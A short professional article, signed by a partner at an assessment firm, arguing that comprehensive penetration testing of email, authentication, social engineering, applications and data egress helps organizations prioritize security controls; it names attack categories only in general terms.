Comprehensive penetration testing can contribute to the security conversation by suggesting organizations prioritize cybersecurity controls that will offer optimal risk remediation against exploits hackers will attempt. Penetration tests, which may include unauthenticated and authenticated tests, should encompass technical, physical, and human tests, alone and combined, revealing specific cascading sequences of exploits and kill-chains.
Here’s how organizations can get the most out of pen tests:
- Understand how well email safeguards work.
We all know email systems stand on the frontlines of the ransomware wars. Detailed penetration testing will reveal how well an organization’s email system handles various attacks. First, comprehensive penetration testing will assess email platform-based vulnerabilities such as relay, enumeration, rate limiting, MX record bypass, and spoofing misconfigurations. Testing to reveal if extraneous Exchange Web Services or native Outlook client authentication schemes expose the organization to multi-factor authentication (MFA) bypass attacks also makes sense. Additionally, the team must thoroughly test all inbound email controls, with tests involving a range of emails containing malicious attachments and links. Testing should also include outbound email data loss prevention controls. With thorough email penetration testing, organizations can develop a roadmap of remediation priorities for this broad expanse of every organization’s attack surface area.
- Learn where authentication and identification schemes are vulnerable.
Authentication and identification controls are a favorite avenue of attack for hackers. Common ways of defeating password controls include spraying, finding, intercepting, cracking, guessing, relaying, bypassing, and even asking for passwords. Are the organization’s users constructing strong passwords, regardless of length and complexity rules? Can password hashes be intercepted and relayed or passed? Is MFA deployed for all essential applications and services? Is MFA deployment susceptible to bypass? Will users divulge credentials to unvetted requesters? If the team doesn’t know the answers to all of these questions, comprehensive penetration can offer important insights.
- Determine which employees are vulnerable to social engineering attacks.
Phishing tools like Knowbe4 and Cofense/Phishme are great training tools, but nothing substitutes for an actual concerted set of social engineering attacks, followed by illustrative technical exploits. Starting with a thorough information gathering phase, a combination of email phishing, phone vishing, and in-person social engineering will put employees to the test. Carried out by experienced penetration testers, social engineering attacks are combined with technical attacks that reveal the true impact of a successful social engineering breach. Only by illustrating social engineering kill-chains can an organization determine which employees are vulnerable, and what the potential impact of a breach.
- Find out which applications are poorly coded.
Applications are architected and developed in many different fashions, and not all have equal security postures. Black box, or unauthenticated, application testing can expose vulnerabilities in platforms, web services, and authentication configurations. Authenticated testing can reveal vulnerabilities around session management, privilege escalation, and session hijacking. Applications also offer attackers an ample opportunity to introduce malicious payloads via file uploads and other data input methods. And mobile applications add multiple mobile device disparate client platforms to the mix. Determining how mobile browsers handle sensitive information is a detailed process. Without deep testing, it’s not possible to accurately assess application security.
- Examine weaknesses that let attackers egress and exfiltrate data.
Once a bad actor or actual malware finds its way onto the network, it’s essential to determine how much work it takes to phone home, import and execute additional malicious payloads, as well as actually exfiltrate data from the system. Comprehensive penetration testing will assess the ability to create encrypted tunnels over common TCP ports such as SSH over port 443, testing the functionality of deep packet inspection and proxy capabilities. Testing will also probe for weaknesses around importing and executing malicious payloads to see how web filters and endpoint security controls intervene. Finally, thorough egress testing will use covert channels, e.g. ICMP or DNS, to exfiltrate sensitive data. Deeper testing will even examine if attackers can use clandestine communications channels over these Internet protocols to set up tunnels back to command and control centers, and remotely control hosts.
Think of comprehensive penetration testing as an important component of the organization’s risk management program. Penetration testing can also shed light on intrusion detection, rogue host prevention, promiscuous protocols, cloud configuration errors, and weaknesses with peripheral devices. By knowing up-front about misconfigurations, default settings, patching, and a myriad of other challenges, systems and security personnel can get the jump on attackers. Remember that in all games of strategy offense trumps defense – it’s always one step ahead.
David Trepp, partner, Information Security Assessment Services Group, BPM LLP